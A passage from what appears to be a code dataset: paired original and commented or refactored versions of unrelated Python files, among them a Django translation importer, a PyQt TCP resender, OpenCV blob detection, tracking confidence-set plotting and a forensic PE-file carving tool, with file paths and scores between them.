help="Path to the data file",
)
def handle(self, *args, **options):
file = options["path"]
data = json.loads(file.read())
print(len(data))
Translation.objects.all().delete()
TranslationGroup.objects.all().delete()
Directory.objects.all().delete()
count = len(data)
for i, row in enumerate(data, start=1):
key = (row["key"] or "").strip()
key_from_value = False
value = row["value_pl"].strip()
value_as_key = value.upper()
nonempty_value = PATTERN.search(value_as_key)
if not key and nonempty_value:
key = f"{value_as_key}_VALUE"
key_from_value = True
if not PATTERN.search(key) or not nonempty_value:
continue
print(f"{i}/{count}")
prev_group = None
for group_name in row["group"].split("."):
assert group_name
prev_group, created = TranslationGroup.objects.get_or_create(
name_en=group_name,
name_pl=group_name,
name_de=group_name,
name_ru=group_name,
parent=prev_group,
)
filepath = row["metadata"]["path"]
if not filepath:
continue
creation_kwargs = {
"key": key,
"value_pl": value,
"parent": prev_group,
"file": filepath,
"line": row["metadata"]["line"],
}
try:
translation = Translation.objects.get(key=key)
if not (key_from_value or translation.value_pl == value):
print("ALERT!!!", key, row)
raise
continue
except Translation.DoesNotExist:
pass
translation, _ = Translation.objects.get_or_create(**creation_kwargs)
parent = None
path = ""
*parts, last_part = filepath.strip("/").split("/")
for part in parts:
path += f"/{part}"
parent, _ = Directory.objects.get_or_create(name=part, path=path, parent=parent)
path += f"/{last_part}"
parent, _ = Directory.objects.get_or_create(name=last_part, path=path, parent=parent, leaf=True) | 0.325735 | 0.124346 |
from PyQt5.QtCore import QObject
from PyQt5.QtCore import QByteArray
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtNetwork import QTcpSocket
from PyQt5.QtNetwork import QAbstractSocket
from settings.netSettings import NetSettings
class _OutcomingConnection:
    """Per-peer state for one outgoing TCP connection (socket + send queue)."""

    def __init__(self):
        self.socketDescriptor = 0   # placeholder; never assigned a real descriptor here
        self.socket = None          # QTcpSocket, created lazily by ResenderEngine.sendPacket
        self.remoteAddress = ""     # peer IP this connection targets
        self.remotePort = 0         # peer data port
        self.connected = False      # True between connected() and disconnected() signals
        self.dataPackets = list()   # queued payloads (bytes) awaiting send
class ResenderEngine(QObject):
    """Maintains outgoing TCP connections to a set of peer nodes.

    Packets are queued per peer and written on the wire as a 4-byte
    little-endian length header followed by the UTF-8 encoded payload.
    `floodPacket` sends to every known peer except the local host and an
    optional excluded address; `sendPacket` targets a single peer and
    creates/connects the socket lazily on first use.
    """

    def __init__(self, parent=None, port=NetSettings.nodeDataPort):
        super().__init__(parent)
        self.__outcomingConnections = dict()  # QMap<QString, OutcomingConnection>
        self.__remoteAddresses = list()  # Ip's
        self.__hostAddress = '127.0.0.1'  # address to omit (our own)
        self.__remotePort = port

    def __del__(self):
        pass
        # self.stop()

    @pyqtSlot(list)
    def setRemoteAddresses(self, addressList: list):
        """Replace the peer list; drops all existing connections first."""
        self.stop()
        #print(addressList, "SET ADDDRESES")
        self.__remoteAddresses = addressList

    @pyqtSlot(str)
    def setHostAddress(self, address: str):
        """Record our own address so flooding can skip it."""
        self.__hostAddress = address

    @pyqtSlot()
    def stop(self):
        """Disconnect every live socket and forget all per-peer state."""
        for outcomingConnection in self.__outcomingConnections.values():
            # outcomingConnection.socket.connected.disconnect()
            # outcomingConnection.socket.disconnected.disconnect()
            # outcomingConnection.socket.error.disconnect()
            if outcomingConnection.connected:
                outcomingConnection.socket.disconnectFromHost()
        self.__outcomingConnections.clear()

    @pyqtSlot(str, str)
    def floodPacket(self, packet: str, addressToOmit=str()):
        """Send *packet* to every peer except *addressToOmit* and ourselves."""
        for address in self.__remoteAddresses:
            #print("FLOOD", address, self.__hostAddress, addressToOmit)
            if not len(address):
                # NOTE(review): an empty entry aborts the WHOLE flood
                # (`return`, not `continue`) -- confirm this is intended.
                return
            if address != addressToOmit and address != self.__hostAddress:
                self.sendPacket(address, packet)

    @pyqtSlot(str, str)
    def sendPacket(self, address: str, packet: str):
        """Queue *packet* for *address*, creating or reconnecting the socket as needed."""
        #print("SEND_PACKET:", address, packet)
        if not address:
            return
        outcomingConnection = self.__outcomingConnections.get(address, None)
        if not outcomingConnection:
            # First packet for this peer: build the connection record and
            # start an asynchronous connect; the packet stays queued until
            # __newConnection fires.
            print("NO IN OUTCOME", address, len(address))
            outcomingConnection = _OutcomingConnection()
            outcomingConnection.dataPackets.append(packet.encode())
            outcomingConnection.socket = QTcpSocket(self)
            outcomingConnection.socket.setSocketOption(QAbstractSocket.LowDelayOption, 1)
            outcomingConnection.socket.setSocketOption(QAbstractSocket.KeepAliveOption, 0)
            # The object name doubles as the dict key recovered in
            # __disconnected / __error via sender().objectName().
            outcomingConnection.socket.setObjectName(address)
            outcomingConnection.socket.connected.connect(self.__newConnection)
            outcomingConnection.socket.disconnected.connect(self.__disconnected)
            outcomingConnection.socket.error.connect(self.__error)
            outcomingConnection.remoteAddress = address
            outcomingConnection.remotePort = self.__remotePort
            outcomingConnection.socket.connectToHost(address, self.__remotePort)
            self.__outcomingConnections[address] = outcomingConnection
            #print("STARTED CON")
        else:
            if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
                # Live connection: queue and flush immediately.
                outcomingConnection.dataPackets.append(packet.encode())
                self._sendPackets(outcomingConnection)
            else:
                # Dead connection: retry the connect unless one is already in
                # flight.  NOTE(review): the packet itself is NOT queued on
                # this branch, so it is silently dropped -- confirm.
                if outcomingConnection.socket.state() != QAbstractSocket.ConnectingState:
                    outcomingConnection.socket.disconnectFromHost()
                    outcomingConnection.socket.connectToHost(outcomingConnection.remoteAddress, self.__remotePort)

    @pyqtSlot()
    def __newConnection(self):
        """Slot: a lazy connect completed; mark the record live and flush its queue."""
        #print("NEW CONNECT TO")
        socket = self.sender()
        outcomingConnection = self.__outcomingConnections[socket.peerAddress().toString()]
        # outcomingConnection.socketDescriptor = socket.socketDescriptor()
        outcomingConnection.connected = True
        # NOTE(review): `disconnected` was already connected in sendPacket;
        # this second connect makes __disconnected fire twice per drop.
        socket.disconnected.connect(self.__disconnected)
        self._sendPackets(outcomingConnection)

    def _sendPackets(self, outcomingConnection: _OutcomingConnection):
        """Write each queued packet as <4-byte LE length><payload>, then clear the queue."""
        #print("SEND PACKET 2")
        if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
            #print("SEND PACKET 2 2")
            packets = outcomingConnection.dataPackets
            for packet in packets:
                packetLength = len(packet)
                bytesWritten = 0
                # NOTE(review): QIODevice.writeData returns -1 on error, which
                # would make these accumulation loops misbehave -- confirm
                # that errors are acceptable to ignore here.
                while bytesWritten != 4:
                    bytesWritten += outcomingConnection.socket.writeData(packetLength.to_bytes(4, byteorder="little"))
                bytesWritten = 0
                while bytesWritten != packetLength:
                    bytesWritten += outcomingConnection.socket.writeData(packet)
                outcomingConnection.socket.flush()
            outcomingConnection.dataPackets.clear()

    @pyqtSlot()
    def __disconnected(self):
        """Slot: peer dropped; mark the record dead and discard its queue."""
        socket = self.sender()
        outcomingConnection = self.__outcomingConnections.get(socket.objectName(), None)
        if outcomingConnection:
            outcomingConnection.connected = False
            outcomingConnection.dataPackets.clear()
            # outcomingConnection.commandPackets.clear()
            # outcomingConnection.dSocket.disconnected.disconnect()
            # outcomingConnection.cSocket.disconnected.disconnect()

    @pyqtSlot()
    def __error(self):
        """Slot: a socket error occurred; details are printed for diagnosis."""
        socket = self.sender()
print("ERROR", socket.errorString(), socket.objectName(), socket.peerAddress().toString()) | shardDesigner/shardTemplateDir/shardNodeDir/netTools/resender.py | from PyQt5.QtCore import QObject
from PyQt5.QtCore import QByteArray
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtNetwork import QTcpSocket
from PyQt5.QtNetwork import QAbstractSocket
from settings.netSettings import NetSettings
class _OutcomingConnection:
def __init__(self):
self.socketDescriptor = 0
self.socket = None
self.remoteAddress = ""
self.remotePort = 0
self.connected = False
self.dataPackets = list()
class ResenderEngine(QObject):
def __init__(self, parent=None, port=NetSettings.nodeDataPort):
super().__init__(parent)
self.__outcomingConnections = dict() # QMap<QString, OutcomingConnection>
self.__remoteAddresses = list() # Ip's
self.__hostAddress = '127.0.0.1' # address to omit
self.__remotePort = port
def __del__(self):
pass
# self.stop()
@pyqtSlot(list)
def setRemoteAddresses(self, addressList: list):
self.stop()
#print(addressList, "SET ADDDRESES")
self.__remoteAddresses = addressList
@pyqtSlot(str)
def setHostAddress(self, address: str):
self.__hostAddress = address
@pyqtSlot()
def stop(self):
for outcomingConnection in self.__outcomingConnections.values():
# outcomingConnection.socket.connected.disconnect()
# outcomingConnection.socket.disconnected.disconnect()
# outcomingConnection.socket.error.disconnect()
if outcomingConnection.connected:
outcomingConnection.socket.disconnectFromHost()
self.__outcomingConnections.clear()
@pyqtSlot(str, str)
def floodPacket(self, packet: str, addressToOmit=str()):
for address in self.__remoteAddresses:
#print("FLOOD", address, self.__hostAddress, addressToOmit)
if not len(address):
return
if address != addressToOmit and address != self.__hostAddress:
self.sendPacket(address, packet)
@pyqtSlot(str, str)
def sendPacket(self, address: str, packet: str):
#print("SEND_PACKET:", address, packet)
if not address:
return
outcomingConnection = self.__outcomingConnections.get(address, None)
if not outcomingConnection:
print("NO IN OUTCOME", address, len(address))
outcomingConnection = _OutcomingConnection()
outcomingConnection.dataPackets.append(packet.encode())
outcomingConnection.socket = QTcpSocket(self)
outcomingConnection.socket.setSocketOption(QAbstractSocket.LowDelayOption, 1)
outcomingConnection.socket.setSocketOption(QAbstractSocket.KeepAliveOption, 0)
outcomingConnection.socket.setObjectName(address)
outcomingConnection.socket.connected.connect(self.__newConnection)
outcomingConnection.socket.disconnected.connect(self.__disconnected)
outcomingConnection.socket.error.connect(self.__error)
outcomingConnection.remoteAddress = address
outcomingConnection.remotePort = self.__remotePort
outcomingConnection.socket.connectToHost(address, self.__remotePort)
self.__outcomingConnections[address] = outcomingConnection
#print("STARTED CON")
else:
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
outcomingConnection.dataPackets.append(packet.encode())
self._sendPackets(outcomingConnection)
else:
if outcomingConnection.socket.state() != QAbstractSocket.ConnectingState:
outcomingConnection.socket.disconnectFromHost()
outcomingConnection.socket.connectToHost(outcomingConnection.remoteAddress, self.__remotePort)
@pyqtSlot()
def __newConnection(self):
#print("NEW CONNECT TO")
socket = self.sender()
outcomingConnection = self.__outcomingConnections[socket.peerAddress().toString()]
# outcomingConnection.socketDescriptor = socket.socketDescriptor()
outcomingConnection.connected = True
socket.disconnected.connect(self.__disconnected)
self._sendPackets(outcomingConnection)
def _sendPackets(self, outcomingConnection: _OutcomingConnection):
#print("SEND PACKET 2")
if outcomingConnection.socket.state() == QAbstractSocket.ConnectedState:
#print("SEND PACKET 2 2")
packets = outcomingConnection.dataPackets
for packet in packets:
packetLength = len(packet)
bytesWritten = 0
while bytesWritten != 4:
bytesWritten += outcomingConnection.socket.writeData(packetLength.to_bytes(4, byteorder="little"))
bytesWritten = 0
while bytesWritten != packetLength:
bytesWritten += outcomingConnection.socket.writeData(packet)
outcomingConnection.socket.flush()
outcomingConnection.dataPackets.clear()
@pyqtSlot()
def __disconnected(self):
socket = self.sender()
outcomingConnection = self.__outcomingConnections.get(socket.objectName(), None)
if outcomingConnection:
outcomingConnection.connected = False
outcomingConnection.dataPackets.clear()
# outcomingConnection.commandPackets.clear()
# outcomingConnection.dSocket.disconnected.disconnect()
# outcomingConnection.cSocket.disconnected.disconnect()
@pyqtSlot()
def __error(self):
socket = self.sender()
print("ERROR", socket.errorString(), socket.objectName(), socket.peerAddress().toString()) | 0.289472 | 0.066055 |
import cv2
import numpy as np
def get_image_mask(input_img, hsv_lower, hsv_upper):
    """Threshold a BGR image in HSV space.

    Converts *input_img* to HSV and returns the binary mask of pixels whose
    HSV triple lies inside [hsv_lower, hsv_upper] (inclusive bounds).
    """
    as_hsv = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)
    return cv2.inRange(as_hsv, hsv_lower, hsv_upper)
def get_contours(input_img, min_contour_area=10.0):
    """Find contours in a binary image and describe those above a size cutoff.

    Args:
        input_img: Single-channel binary image (e.g. a threshold mask).
        min_contour_area: Contours smaller than this are discarded.

    Returns:
        A list of tuples (contour, center, is_convex, area) where `center`
        is the centroid as a (1, 1, 2) int array.

    NOTE(review): assumes the OpenCV 4.x findContours signature returning
    (contours, hierarchy) -- confirm against the installed version.
    """
    contours, _hier = cv2.findContours(input_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    contour_info = []
    # (Removed the original's dead num_nonzeroarea_cnts/num_zeroarea_cnts
    # counters, which were incremented but never read.)
    for c in contours:
        area = cv2.contourArea(c)
        if area < min_contour_area:
            continue
        # Centroid from image moments.  m00 equals the contour area, which is
        # non-zero here as long as min_contour_area > 0.
        M = cv2.moments(c)
        cX = int(M["m10"] / M["m00"])
        cY = int(M["m01"] / M["m00"])
        contour_info.append(
            (
                c,
                np.array([[[cX, cY]]]),
                cv2.isContourConvex(c),
                area,
            )
        )
    return contour_info
def draw_contours(
    input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
    """Render each contour from a list of contour-info tuples onto a copy of
    *input_img* and return the copy; the input image is left untouched."""
    canvas = input_img.copy()
    for info in contours_list:
        # info[0] is the raw contour point array (see get_contours).
        cv2.drawContours(canvas, [info[0]], 0, color, thickness)
    return canvas
def draw_contours_straight(
    input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
    """Render contours given directly as point arrays (not info tuples) onto
    a copy of *input_img* and return the copy."""
    canvas = input_img.copy()
    for points in contours_list:
        cv2.drawContours(canvas, [points], 0, color, thickness)
    return canvas
def load_centers(image_name):
    """Compute blob centroids and areas for the bright regions of an image.

    Reads *image_name*, thresholds its grayscale version at 200, extracts
    contours, and binds `centers` (an (N, 2) centroid array) and `sizes`
    (an N-element area array) for the final `return centers, sizes`.

    Removed dead work from the original: the all-white HSV mask, the
    bilateral blur, Canny edges, the high-pass filtered image, and the two
    debug drawings were computed but never influenced the returned values
    (the first `contours` result was immediately overwritten as well).
    """
    img = cv2.imread(image_name)
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Bright pixels (> 200) form the blob mask.
    ret, thresh_img = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)
    contours = get_contours(thresh_img, min_contour_area=1)
    # Each contour-info tuple is (contour, center(1,1,2), convex, area);
    # stack the centers into (N, 2) and the areas into (N,).
    centers = np.array([info[1] for info in contours]).reshape(len(contours), 2)
    sizes = np.array([info[3] for info in contours])
return centers, sizes | art/blips/processor.py | import cv2
import numpy as np
def get_image_mask(input_img, hsv_lower, hsv_upper):
# define the lower and upper boundaries of the "green"
# ball in the HSV color space, then initialize the
# list of tracked points
# hsv_lower = (67, 0, 0)
# hsv_upper = (86, 255, 255)
hsv_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)
#cv2.imwrite("androhvs.jpeg", hsv_img)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
img_mask = cv2.inRange(hsv_img, hsv_lower, hsv_upper)
return img_mask
def get_contours(input_img, min_contour_area=10.0):
contour, hier = cv2.findContours(input_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
contour_info = []
num_nonzeroarea_cnts = 0
num_zeroarea_cnts = 0
for c in contour:
if cv2.contourArea(c) >= min_contour_area:
num_nonzeroarea_cnts += 1
# compute the center of the contour
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
contour_info.append(
(
c,
np.array([[[cX, cY]]]),
cv2.isContourConvex(c),
cv2.contourArea(c),
)
)
else:
num_zeroarea_cnts += 1
return contour_info
def draw_contours(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info[0]], 0, color, thickness)
return output_img
def draw_contours_straight(
input_img, contours_list, color=(0, 0, 255), thickness=1, debug=False
):
output_img = input_img.copy()
for idx, c_info in enumerate(contours_list):
cv2.drawContours(output_img, [c_info], 0, color, thickness)
return output_img
def load_centers(image_name):
img = cv2.imread(image_name)
mask = get_image_mask(img, (255, 255, 255), (255, 255, 255))
contours = get_contours(mask, min_contour_area=1)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# cv2.imwrite(f'{image_name}_grey.jpeg', gray)
# cv.bilateralFilter() is highly effective in noise removal while keeping edges sharp
blurred = cv2.bilateralFilter(gray, 5, 15, 15)
canny_img = cv2.Canny(gray, 30, 150)
# cv2.imwrite(f'{image_name}_canny.jpeg', canny_img)
# edge detection filter
kernel = np.array([[0.0, -1.0, 0.0], [-1.0, 5.0, -1.0], [0.0, -1.0, 0.0]])
kernel = kernel / (np.sum(kernel) if np.sum(kernel) != 0 else 1)
# filter the source image
img_rst = cv2.filter2D(img, -1, kernel)
# cv2.imwrite(f'{image_name}_hpass.jpeg', img_rst)
ret, thresh_img = cv2.threshold(gray, 200, 255, cv2.THRESH_BINARY)
# cv2.imwrite(f'{image_name}_thres.jpeg', thresh_img)
contours = get_contours(thresh_img, min_contour_area=1)
circles = draw_contours(mask, contours, color=(255, 255, 255), thickness=1)
# cv2.imwrite(f'/tmp/tmp_circles.jpeg', circles)
centers = list(map(lambda x: x[1], contours))
centers = np.array(centers).reshape(len(centers), 2)
sizes = np.array(list(map(lambda x: x[3], contours)))
cimage = draw_contours_straight(
mask,
centers.reshape(len(centers), 1, 1, 2),
color=(255, 255, 255),
thickness=10,
)
# cv2.imwrite(f'{image_name}_centers.jpeg', cimage)
return centers, sizes | 0.533397 | 0.388763 |
import os, sys
import pickle
from PIL import Image, ImageDraw
import torch as tc
from torchvision import transforms
sys.path.append("../../")
sys.path.append("otb")
from data.otb import *
from otb.forecasters import load_forecaster_full, load_forecaster
from conf_set.conf_set import ConfSetReg as ConfSetModel
def xyxy2xywh(xyxy):
    """Convert corner-format boxes (x1, y1, x2, y2) to (x, y, w, h).

    Operates row-wise on an (N, 4) tensor and returns a new tensor; the
    input is not modified.
    """
    converted = xyxy.clone()
    converted[:, 2] = xyxy[:, 2] - xyxy[:, 0]
    converted[:, 3] = xyxy[:, 3] - xyxy[:, 1]
    return converted
if __name__ == "__main__":
    # Visualize PAC confidence-set predictions against ground truth on OTB
    # tracking frames: for each frame, draw ground truth (white), the point
    # prediction (red) and the confidence box (green), then save the image.
    ## parameters
    dsld = loadOTB("datasets/otb", 100, bb_format="xyxy")  # boxes as (x1, y1, x2, y2)
    cs_root = "otb/snapshots/pac_conf_set"  # saved calibrated forecaster + conf-set params
    plot_root = "otb/plot_conf_set"         # output folder for annotated frames
    n = 5000        # calibration-set size used by the confidence set
    eps = 0.01      # PAC error tolerance
    delta = 1e-5    # PAC confidence parameter
    n_plots = float('inf')  # cap on the number of frames rendered
    ## init
    os.makedirs(plot_root, exist_ok=True)
    # load a forecaster
    # Load calibrated parameters (T) and copy them into the full forecaster
    # used for inference on GPU.
    F_precomp = load_forecaster(None)
    assert(F_precomp.load(os.path.join(cs_root, "F_cal/model_params_cal")))
    print(F_precomp)
    F = load_forecaster_full()
    F.T.data = F_precomp.T
    print(F.cal_parameters())
    F.cuda()
    F.eval()
    print(F)
    ## load a confidence set
    # Same pattern for the confidence set: load the precomputed threshold and
    # transfer it onto the model backed by the full forecaster.
    C_precomp = ConfSetModel(F_precomp, eps, delta, n)
    C_precomp.load_cs(cs_root, 'cs') ## main results
    C = ConfSetModel(F, eps, delta, n)
    C.T = C_precomp.T
    C.eval()
    print(C.T)
    ## predict a confidence set for tracking
    i = 0
    for xs, ys in dsld.tracking:
        # The last two entries of xs carry bookkeeping (sequence id, frame id);
        # the model consumes xs[0], xs[1] and the raw frame xs[4].
        seq_ids = xs[-2]
        frame_ids = xs[-1]
        xs = [xs[0], xs[1], xs[4]]
        xs = [x.cuda() for x in xs]
        ys = ys.cuda()
        ## original prediction
        yhs_ori, _ = C.model_F.baseF(xs)
        opts = C.model_F.baseF.opts
        yhs_ori = C.model_F.baseF.decode_output(xs, yhs_ori, opts)
        ## cs prediction
        # Combine the per-coordinate bounds into one outer box: lower bound of
        # the top-left corner, upper bound of the bottom-right corner.
        # NOTE(review): presumably this is the loosest box covering the
        # confidence set -- confirm against ConfSetReg's semantics.
        lb, ub = C(xs)
        bb_ovap = tc.cat((lb[:, :2], ub[:, 2:]), 1)
        opts = C.model_F.baseF.opts
        yhs_cs_ovap = C.model_F.baseF.decode_output(xs, bb_ovap, opts)
        for x, y, seq_id, frame_id, y_ori, y_cs in zip(xs[2].detach().cpu(), ys.detach().cpu(), seq_ids, frame_ids, yhs_ori.detach().cpu(), yhs_cs_ovap.detach().cpu()):
            x_pil = transforms.ToPILImage()(x)
            draw = ImageDraw.Draw(x_pil)
            draw.rectangle(y.tolist(), outline="white", width=2)      # ground truth
            draw.rectangle(y_ori.tolist(), outline="red", width=2)    # point prediction
            draw.rectangle(y_cs.tolist(), outline="green", width=5)   # confidence box
            fn = os.path.join(plot_root, "%s_%.4d.png"%(seq_id, frame_id))
            x_pil.save(fn)
            i += 1
            if i > n_plots:
                break
        if i > n_plots:
break | demo/conf_set/otb/plot_conf_set.py | import os, sys
import pickle
from PIL import Image, ImageDraw
import torch as tc
from torchvision import transforms
sys.path.append("../../")
sys.path.append("otb")
from data.otb import *
from otb.forecasters import load_forecaster_full, load_forecaster
from conf_set.conf_set import ConfSetReg as ConfSetModel
def xyxy2xywh(xyxy):
xywh = xyxy.clone()
xywh[:, 2:] = xyxy[:, 2:] - xyxy[:, :2]
return xywh
if __name__ == "__main__":
## parameters
dsld = loadOTB("datasets/otb", 100, bb_format="xyxy")
cs_root = "otb/snapshots/pac_conf_set"
plot_root = "otb/plot_conf_set"
n = 5000
eps = 0.01
delta = 1e-5
n_plots = float('inf')
## init
os.makedirs(plot_root, exist_ok=True)
# load a forecaster
F_precomp = load_forecaster(None)
assert(F_precomp.load(os.path.join(cs_root, "F_cal/model_params_cal")))
print(F_precomp)
F = load_forecaster_full()
F.T.data = F_precomp.T
print(F.cal_parameters())
F.cuda()
F.eval()
print(F)
## load a confidence set
C_precomp = ConfSetModel(F_precomp, eps, delta, n)
C_precomp.load_cs(cs_root, 'cs') ## main results
C = ConfSetModel(F, eps, delta, n)
C.T = C_precomp.T
C.eval()
print(C.T)
## predict a confidence set for tracking
i = 0
for xs, ys in dsld.tracking:
seq_ids = xs[-2]
frame_ids = xs[-1]
xs = [xs[0], xs[1], xs[4]]
xs = [x.cuda() for x in xs]
ys = ys.cuda()
## original prediction
yhs_ori, _ = C.model_F.baseF(xs)
opts = C.model_F.baseF.opts
yhs_ori = C.model_F.baseF.decode_output(xs, yhs_ori, opts)
## cs prediction
lb, ub = C(xs)
bb_ovap = tc.cat((lb[:, :2], ub[:, 2:]), 1)
opts = C.model_F.baseF.opts
yhs_cs_ovap = C.model_F.baseF.decode_output(xs, bb_ovap, opts)
for x, y, seq_id, frame_id, y_ori, y_cs in zip(xs[2].detach().cpu(), ys.detach().cpu(), seq_ids, frame_ids, yhs_ori.detach().cpu(), yhs_cs_ovap.detach().cpu()):
x_pil = transforms.ToPILImage()(x)
draw = ImageDraw.Draw(x_pil)
draw.rectangle(y.tolist(), outline="white", width=2)
draw.rectangle(y_ori.tolist(), outline="red", width=2)
draw.rectangle(y_cs.tolist(), outline="green", width=5)
fn = os.path.join(plot_root, "%s_%.4d.png"%(seq_id, frame_id))
x_pil.save(fn)
i += 1
if i > n_plots:
break
if i > n_plots:
break | 0.398406 | 0.39321 |
import argparse
import bitstring # Used to parse data. Download from: http://code.google.com/p/python-bitstring/
import os
import pefile # Used to parse PE header. Download from: http://code.google.com/p/pefile/
import sys
from datetime import datetime
g_log = ''
def file_exists(fname):
    """Return True when *fname* exists and is readable by the current user."""
    if not os.path.exists(fname):
        return False
    return os.access(fname, os.R_OK)
def log(string):
    """Tee *string* to stdout and append it to the global log file (if set).

    BUG FIX: the original comment promised tee behavior but the function
    never printed, so without --log the tool produced no progress output.
    Also closes the log file deterministically and narrows the bare except
    (which silently swallowed even KeyboardInterrupt) to I/O errors only.
    """
    print(string)
    if g_log:
        try:
            with open(g_log, 'a') as fp:
                fp.write(string + '\n')
        except (IOError, OSError):
            # Best-effort logging: a failed log write must not kill the carve.
            pass
def getSize_FromPE(PE_data):
    """Return the file size implied by a PE header's section table, or 0.

    End of image = last section's raw offset + raw size.  Overlay data
    appended after the sections (SFX archives, signatures, etc.) is NOT
    included -- same limitation as the original.

    Args:
        PE_data: Raw bytes starting at the candidate MZ header.
    """
    try:
        pe = pefile.PE(data=PE_data)
        last_section = pe.sections[-1]
        return last_section.PointerToRawData + last_section.SizeOfRawData
    except Exception:
        # Malformed/truncated headers are routine when carving raw data, so
        # treat them as "not a usable PE".  BUG FIX: the original bare
        # `except:` also trapped KeyboardInterrupt/SystemExit.
        return 0
def getArgs():
    """Parse command-line arguments; exits with help/usage on bad input.

    Side effect: sets the module-global g_log when --log is supplied.
    """
    global g_log
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', help='Raw file to carve', required=True)
    parser.add_argument('-o', '--output', help='Output folder for extracted files', required=True)
    parser.add_argument('--log', help='Log output file', required=False)
    if len(sys.argv) == 1:
        # No arguments at all: show full help instead of argparse's terse error.
        parser.print_help()
        sys.exit(1)
    args = parser.parse_args()
    if args.file and not file_exists(args.file):
        # Consistency fix: use the function form of print like the rest of
        # the file (valid for a single argument on both Python 2 and 3).
        print('[!] Source file not found: {}'.format(args.file))
        sys.exit(1)
    if args.log:
        g_log = args.log
    return args
def main():
    """Carve PE executables out of a raw binary image.

    Finds every 'This program' string (from the DOS stub), backtracks 78
    bytes to the candidate MZ header, sizes the candidate from its PE
    section table, and writes plausible hits to the output folder as
    .livebin files.
    """
    args = getArgs()
    if args.output:
        if not file_exists(args.output):
            print('[!] Output folder does not exist: {}'.format(args.output))
            quit()
        output_folder = args.output
    else:
        output_folder = '.'
    time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
    log('Scan started on %s at %s' % (args.file, time))
    entries = []
    fstream = bitstring.ConstBitStream(filename = args.file)
    # Hex for the ASCII text 'This program' found in the DOS stub message.
    results = fstream.findall(b'0x546869732070726F6772616D')
    log('Gathering search hits...')
    for i in results:
        # The result offsets are stored as binary values, so you have to divide by 8
        # -78 is the negative offset to the beginning of 'MZ' from 'This program'
        # NOTE(review): int(i)/8 is float division on Python 3; the print
        # statement in getSize's era code implies this targets Python 2,
        # where it stays integral -- confirm the intended interpreter.
        hit = int(i)/8-78
        entries.append(hit)
    log('Parsing EXEs...')
    ifile = open(args.file, 'rb')
    for hit in entries:
        ifile.seek(hit)
        PE_header = ifile.read(1024)
        pesize = getSize_FromPE(PE_header)
        # These sizes are arbitrary. Had numerous junk PE headers (>30GB), so did base limiting
        # NOTE(review): comparing bytes to the str 'MZ' only matches on
        # Python 2; under Python 3 this condition is always False -- confirm.
        if (10000 < pesize < 2000000) and PE_header[0:2] == 'MZ':
            log('Found at: 0x%X (%d bytes)' % (hit, pesize))
            ifile.seek(hit)
            PE_data = ifile.read(pesize)
            # Output name: <source basename>_<hex offset>.livebin (the split
            # on '\\' assumes Windows-style input paths).
            outfile = os.path.join(output_folder, '%s_%X.livebin' % (args.file.split('\\')[-1], hit))
            open(outfile, 'wb').write(PE_data)
        else:
            log('Ignored PE header at 0x%X' % hit)
    time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
    log('Scan ended on %s at %s' % (args.file, time))
if __name__ == '__main__':
main() | pe_carve.py |
import argparse
import bitstring # Used to parse data. Download from: http://code.google.com/p/python-bitstring/
import os
import pefile # Used to parse PE header. Download from: http://code.google.com/p/pefile/
import sys
from datetime import datetime
g_log = ''
def file_exists(fname):
    """Return True when *fname* exists on disk and is readable by this process."""
    readable = os.access(fname, os.R_OK)
    return os.path.exists(fname) and readable
def log(string):
    """Tee *string* to stdout and, when a log file is configured, append it there.

    The original comment promised a tee to stdout but the code never printed,
    leaving the tool silent when run interactively — fixed by printing first.
    Logging failures are deliberately non-fatal: a broken log file must not
    abort a long carving run.
    """
    print(string)
    if g_log:
        try:
            # Context manager guarantees the handle is closed per call.
            with open(g_log, 'a') as log_file:
                log_file.write(string + '\n')
        except OSError:
            # Best-effort logging only; never crash the carve over a log write.
            pass
def getSize_FromPE(PE_data):
    """Return the file size implied by the PE headers in *PE_data*, or 0.

    Performs basic lookup to find the end of an EXE, based upon the size of
    PE sections (last section's raw offset + raw size). The same algorithm is
    used to find EXE overlay. FYI: this will miss any overlay data, such as
    RAR SFX archives, etc.

    :param PE_data: bytes believed to start with an MZ/PE header.
    :return: int end-of-image offset, or 0 when the data cannot be parsed.
    """
    try:
        pe = pefile.PE(data=PE_data)
        last_section = pe.sections[-1]
        return last_section.PointerToRawData + last_section.SizeOfRawData
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # still propagate; any parse failure on a junk hit yields 0.
        return 0
def getArgs():
    """Parse command-line arguments and configure the global log path.

    Exits with status 1 when no arguments are given (after printing help)
    or when the source file is missing/unreadable.

    :return: the parsed ``argparse.Namespace``.
    """
    global g_log
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--file', help='Raw file to carve', required=True)
    parser.add_argument('-o', '--output', help='Output folder for extracted files', required=True)
    parser.add_argument('--log', help='Log output file', required=False)
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    args = parser.parse_args()
    if args.file and not file_exists(args.file):
        # Was a Python-2 `print` statement — a SyntaxError on Python 3,
        # where the rest of this file already uses print().
        print('[!] Source file not found: {}'.format(args.file))
        sys.exit(1)
    if args.log:
        g_log = args.log
    return args
def main():
    """Carve PE images out of a raw byte stream.

    Searches the input for the ASCII string 'This program' (part of the
    standard DOS stub), backs up 78 bytes to the expected 'MZ' signature,
